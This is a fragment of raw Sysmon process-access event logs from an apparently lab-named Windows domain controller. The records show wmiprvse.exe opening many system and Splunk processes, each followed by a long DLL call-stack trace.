:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.771{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:16.755{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 